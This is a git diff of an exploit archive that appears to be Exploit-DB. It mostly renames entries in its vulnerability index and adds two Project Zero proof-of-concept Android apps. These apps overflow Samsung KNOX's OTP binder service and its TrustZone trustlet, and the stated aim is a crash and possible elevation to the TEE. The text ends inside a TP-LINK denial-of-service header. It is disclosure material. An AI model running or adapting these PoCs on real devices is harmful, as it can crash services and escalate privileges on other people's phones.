SQL Injection",2011-06-21,"Brendan Coles",php,webapps,0 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 -17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 +17435,platforms/php/webapps/17435.txt,"BrewBlogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps,0 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0 17442,platforms/jsp/webapps/17442.txt,"ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 @@ -29015,8 +29019,8 @@ id,file,description,date,author,platform,type,port 27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 - users_profiles.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27473,platforms/asp/webapps/27473.txt,"EZHomePagePro 1.5 - users_mgallery.asp usid Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27475,platforms/php/webapps/27475.txt,"SaPHPLesson 2.0 - print.php SQL Injection",2006-03-27,Linux_Drox,php,webapps,0 -27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - print.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 -27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 - mail.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 +27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - 'print.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 +27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 - 'mail.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 - Toast.asp Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 27480,platforms/asp/webapps/27480.txt,"Online Quiz System - prequiz.asp exam Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27481,platforms/asp/webapps/27481.txt,"Online Quiz System - student.asp msg Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 @@ -30755,9 +30759,9 @@ id,file,description,date,author,platform,type,port 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - admin/index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 -29845,platforms/php/webapps/29845.txt,"PHPwebnews 0.1 - iklan.php m_txt Parameter Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 -29846,platforms/php/webapps/29846.txt,"PHPwebnews 0.1 - 'index.php' m_txt Parameter Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 -29847,platforms/php/webapps/29847.txt,"PHPwebnews 0.1 - bukutamu.php m_txt Parameter Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 +29845,platforms/php/webapps/29845.txt,"PHPwebnews 0.1 - 'iklan.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 +29846,platforms/php/webapps/29846.txt,"PHPwebnews 0.1 - 'index.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 +29847,platforms/php/webapps/29847.txt,"PHPwebnews 0.1 - 'bukutamu.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 29848,platforms/php/webapps/29848.txt,"TuMusika Evolution 1.6 - 'index.php' Cross-Site Scripting",2007-04-12,the_Edit0r,php,webapps,0 29849,platforms/php/webapps/29849.html,"ToendaCMS 1.5.3 - HTTP Get And Post Forms HTML Injection",2007-04-12,"Hanno Boeck",php,webapps,0 29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - Check_login.asp Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps,0 @@ -31303,7 +31307,7 @@ id,file,description,date,author,platform,type,port 30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - getpath.aspx Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0 30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 - chat/deluser.php3 LIMIT Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0 30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 - chat/users_popupL.php3 Multiple Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0 -30848,platforms/php/webapps/30848.txt,"Joomla! Component com_content 1.5 RC3 - 'index.php' view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 +30848,platforms/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30849,platforms/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30851,platforms/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps,0 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,php,webapps,0 @@ -31418,8 +31422,8 @@ id,file,description,date,author,platform,type,port 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 -31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 -31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 +31061,platforms/php/webapps/31061.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 +31062,platforms/php/webapps/31062.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - 'pref.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 - 'search.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps,0 @@ -32158,7 +32162,7 @@ id,file,description,date,author,platform,type,port 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - (upload.php Filename Parameter) Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 -32168,platforms/php/webapps/32168.txt,"Pluck 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0 +32168,platforms/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0 32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,php,webapps,0 32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 32171,platforms/php/webapps/32171.txt,"Softbiz Image Gallery - images.php Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 @@ -32210,7 +32214,7 @@ id,file,description,date,author,platform,type,port 32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 - RegRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross-Site Scripting",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross-Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 -32239,platforms/php/webapps/32239.txt,"Trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0 +32239,platforms/php/webapps/32239.txt,"Fonality trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0 32249,platforms/jsp/webapps/32249.txt,"Openfire 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",jsp,webapps,0 32250,platforms/php/webapps/32250.py,"mUnky 0.01 - 'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",php,webapps,0 32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Parameter Local File Inclusion",2008-08-15,Lostmon,php,webapps,0 @@ -32223,7 +32227,7 @@ id,file,description,date,author,platform,type,port 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Parameter Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0 -32263,platforms/php/webapps/32263.txt,"Trixbox - 'endpoint_aastra.php mac Parameter' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 +32263,platforms/php/webapps/32263.txt,"Fonality trixbox - 'mac' Parameter Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -32913,7 +32917,6 @@ id,file,description,date,author,platform,type,port 33545,platforms/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 33546,platforms/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0 -33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0 33550,platforms/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0 33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0 @@ -33657,7 +33660,7 @@ id,file,description,date,author,platform,type,port 34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0 34788,platforms/php/webapps/34788.txt,"MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0 -34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 +34790,platforms/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34792,platforms/php/webapps/34792.txt,"Swinger Club Portal - start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0 34793,platforms/php/webapps/34793.txt,"Top Paidmailer - 'home.php' Remote File Inclusion",2009-07-13,Moudi,php,webapps,0 @@ -34461,7 +34464,7 @@ id,file,description,date,author,platform,type,port 36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' Parameter SQL Injection",2011-09-08,SubhashDasyam,php,webapps,0 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 -36129,platforms/php/webapps/36129.txt,"Pluck 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 +36129,platforms/php/webapps/36129.txt,"Pluck CMS 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps,0 36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0 @@ -34525,7 +34528,7 @@ id,file,description,date,author,platform,type,port 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0 -36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 +36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0 @@ -34581,7 +34584,7 @@ id,file,description,date,author,platform,type,port 36298,platforms/php/webapps/36298.txt,"Joomla! Component 'com_alfcontact' 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 36301,platforms/php/webapps/36301.txt,"WordPress Plugin Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 -36302,platforms/php/webapps/36302.txt,"Joomla! Component 'com_content' - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 +36302,platforms/php/webapps/36302.txt,"Joomla! Component Content - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0 36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 @@ -35031,7 +35034,7 @@ id,file,description,date,author,platform,type,port 36979,platforms/php/webapps/36979.sh,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,php,webapps,0 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Parameter Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 -36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0 +36986,platforms/php/webapps/36986.txt,"Pluck CMS 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0 36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injections",2015-05-11,"Filippo Roncari",php,webapps,0 @@ -35575,7 +35578,7 @@ id,file,description,date,author,platform,type,port 37789,platforms/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0 37790,platforms/php/webapps/37790.txt,"FBDj - 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0 37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps,0 -37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS - cat2.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 +37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS - 'id' Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS - special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS - article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37943,platforms/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0 @@ -36356,12 +36359,12 @@ id,file,description,date,author,platform,type,port 39344,platforms/php/webapps/39344.txt,"ol-commerce - /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39345,platforms/php/webapps/39345.txt,"ol-commerce - /OL-Commerce/create_account.php country Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39346,platforms/php/webapps/39346.txt,"ol-commerce - /OL-Commerce/admin/create_account.php entry_country_id Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39347,platforms/php/webapps/39347.txt,"Fonality trixbox - /maint/modules/endpointcfg/endpoint_generic.php mac Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39348,platforms/php/webapps/39348.txt,"Fonality trixbox - /maint/modules/home/index.php lang Parameter Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39349,platforms/php/webapps/39349.txt,"Fonality trixbox - '/maint/modules/asterisk_info/asterisk_info.php' lang Parameter Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39350,platforms/php/webapps/39350.txt,"Fonality trixbox - /maint/modules/repo/repo.php lang Parameter Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39351,platforms/php/webapps/39351.txt,"Fonality trixbox - '/maint/modules/endpointcfg/endpointcfg.php' lang Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39352,platforms/php/webapps/39352.txt,"Fonality trixbox - /var/www/html/maint/modules/home/index.php lang Parameter Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39347,platforms/php/webapps/39347.txt,"Fonality trixbox - 'endpoint_generic.php' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39348,platforms/php/webapps/39348.txt,"Fonality trixbox - 'index.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39349,platforms/php/webapps/39349.txt,"Fonality trixbox - 'asterisk_info.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39350,platforms/php/webapps/39350.txt,"Fonality trixbox - 'repo.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39351,platforms/php/webapps/39351.txt,"Fonality trixbox - 'endpointcfg.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39352,platforms/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39354,platforms/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,php,webapps,80 39355,platforms/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80 39356,platforms/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80 @@ -36870,3 +36873,4 @@ id,file,description,date,author,platform,type,port 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0 40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0 40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80 +40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 diff --git a/platforms/android/dos/40913.java b/platforms/android/dos/40913.java new file mode 100755 index 000000000..6033c1063 --- /dev/null +++ b/platforms/android/dos/40913.java @@ -0,0 +1,64 @@ +/** +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=935 + +As a part of the KNOX extensions available on Samsung devices, Samsung provides a new service which allows the generation of OTP tokens. + +The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e). However, in order to allow easy communication between the Non-secure World (NWD) and the Secure-World (SW) trustlet, a new server has been created. This server, called "otp_server", publishes a binder service called "OTP". + +The service provides a single command via binder (command code 2), which allows a client to provide a buffer from the NWD to be sent to the SW. The requests are serialized to the parcel as a 32-bit length field, followed by the actual request data. + +However, "otp_server" does not validate the request length field at all, allowing an attacker to specify any value. This length field is then used in a "memcpy" call in order to copy the data from the parcel to an internal heap-allocated buffer. + +On the device I'm working on (SM-G925V), the "OTP" service can be accessed from any user, and the "otp_server" process runs with UID system and context "u:r:otp_server:s0". + +I've attached a small PoC which can be used to trigger the overflow. Running it should crash "otp_server". +*/ + +package com.example.laginimaineb.otp; + +import android.os.IBinder; +import android.os.Parcel; +import android.os.RemoteException; +import android.support.v7.app.AppCompatActivity; +import android.os.Bundle; +import android.util.Log; + +public class MainActivity extends AppCompatActivity { + + /** + * The logtag used. + */ + private static final String LOGTAG = "OTP_TEST"; + + /** + * The name of the OTP binder service. + */ + private static final String INTERFACE_DESCRIPTOR = "OTP"; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + setContentView(R.layout.activity_main); + + try { + //Getting the binder + Class smClass = Class.forName("android.os.ServiceManager"); + IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR); + + //Creating a connection + Parcel parcel = Parcel.obtain(); + Parcel reply = Parcel.obtain(); + parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR); + int length = 0xFFFF; + parcel.writeInt(length); //Buffer length + for (int i = 0; i < length/4 + 1; i++) + parcel.writeInt(0xABABABAB); + binder.transact(2, parcel, reply, 0); + reply.recycle(); + parcel.recycle(); + + } catch (RemoteException ex) { + Log.e(LOGTAG, "Failed to communicate with remote binder", ex); + } + } +} diff --git a/platforms/android/dos/40914.java b/platforms/android/dos/40914.java new file mode 100755 index 000000000..5c416a866 --- /dev/null +++ b/platforms/android/dos/40914.java @@ -0,0 +1,86 @@ +/** +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=938 + +As a part of the KNOX extensions available on Samsung devices, Samsung provides a TrustZone trustlet which allows the generation of OTP tokens. + +The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e), which can be communicated with using the "OTP" service, published by "otp_server". + +Many of the internal commands supported by the trustlet must either unwrap or wrap a token. They do so by calling the functions "otp_unwrap" and "otp_wrap", correspondingly. + +Both functions copy the internal token data to a local stack based buffer before attempting to wrap or unwrap it. However, this copy operation is performed using a length field supplied in the user's buffer (the length field's offset changes according to the calling code-path), which is not validated at all. + +This means an attacker can supply a length field larger than the stack based buffer, causing the user-controlled token data to overflow the stack buffer. There is no stack cookie mitigation in MobiCore trustlets. + +On the device I'm working on (SM-G925V), the "OTP" service can be accessed from any user, including from the SELinux context "untrusted_app". Successfully exploiting this vulnerability should allow a user to elevate privileges to the TrustZone TEE. + +I've attached a small PoC which can be used to trigger the overflow. It calls the OTP_GENERATE_OTP command with a large length field which overflows the trustlet's stack. Running it should crash OTP trustlet. +*/ + +package com.example.laginimaineb.otp; + +import android.os.IBinder; +import android.os.Parcel; +import android.os.RemoteException; +import android.support.v7.app.AppCompatActivity; +import android.os.Bundle; +import android.util.Log; + +public class OneWhoKNOX extends AppCompatActivity { + + /** + * The logtag used. + */ + private static final String LOGTAG = "OTP_TEST"; + + /** + * The name of the OTP binder service. + */ + private static final String INTERFACE_DESCRIPTOR = "OTP"; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + setContentView(R.layout.activity_main); + + try { + //Getting the binder + Class smClass = Class.forName("android.os.ServiceManager"); + IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR); + + //Writing a command with a large length field + Parcel parcel = Parcel.obtain(); + Parcel reply = Parcel.obtain(); + parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR); + byte[] command = new byte[0xDA7]; + + //Setting the command to OTP_GENERATE_OTP + command[0] = 0x02; + command[1] = 0x00; + command[2] = 0x00; + command[3] = 0x00; + + //Setting the length field to something insane + command[0x41C] = (byte)0xFF; + command[0x41C + 1] = (byte)0xFF; + command[0x41C + 2] = (byte)0x00; + command[0x41C + 3] = (byte)0x00; + + //Sending the command (should crash the trustlet) + parcel.writeByteArray(command); + binder.transact(2, parcel, reply, 0); + Log.e(LOGTAG, "res=" + reply.readInt()); + reply.recycle(); + parcel.recycle(); + + } catch (ClassNotFoundException | + NoSuchMethodException | + IllegalAccessException | + InvocationTargetException ex) { + Log.e(LOGTAG, "Failed to dynamically load ServiceManager methods", ex); + } + + } catch (RemoteException ex) { + Log.e(LOGTAG, "Failed to communicate with remote binder", ex); + } + } +} \ No newline at end of file diff --git a/platforms/hardware/dos/40910.txt b/platforms/hardware/dos/40910.txt new file mode 100755 index 000000000..70a586414 --- /dev/null +++ b/platforms/hardware/dos/40910.txt @@ -0,0 +1,39 @@ +# Exploit Title: TP-LINK TD-W8151N - Denial of Service +# Date: 2016-12-13 +# Exploit Author: Persian Hack Team +# Discovered by : Mojtaba MobhaM +# Home : http://persian-team.ir/ 